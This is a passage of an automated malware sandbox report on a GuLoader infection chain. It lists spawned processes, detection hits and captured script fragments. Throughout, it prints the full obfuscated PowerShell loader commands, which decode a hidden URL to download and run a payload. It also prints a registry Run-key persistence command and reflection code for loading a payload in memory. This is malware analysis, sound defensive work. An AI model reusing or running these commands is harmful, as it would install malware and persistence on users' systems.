EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs"
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbat
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exeJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbatJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""++$Skatepark;++$Skatepark;$Skatepark=$", "", "", "0");
          Yara detected GuLoader
          Source: Yara matchFile source: 00000005.00000002.2804900033.0000000008CCE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2804880582.0000000008BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Tredobl $Clotures $Druelighedens), (Octolateral @([IntPtr], [UInt32]) ([IntPtr])))$Callipygias89 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.Global
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Megawatten)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Rostbffers, $false).DefineType($Suffleringerne
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Frifundnes249)$Undone239 = [System.Text.Encoding]::ASCII.GetString($Malgr)$Dimetrodon=$Undone239.substring(336547,25818)<#Glimmering Enkeltdeln jungmndenes #>Function Sinew($Orthodox
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Diapositiver $Pyloristenosis $Siricoidea), (Badevgtene @([IntPtr], [UInt32]) ([IntPtr])))$Operatrerne = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.G
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Grundforskningsfond)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Num146, $false).DefineType($moentenhe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nectandra)$Nonperversive = [System.Text.Encoding]::ASCII.GetString($omkarterings)$Joggingtj=$Nonperversive.substring(296531,25873)<#Syntaxis Psykoanalytikernes Baronetage karbonats A
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 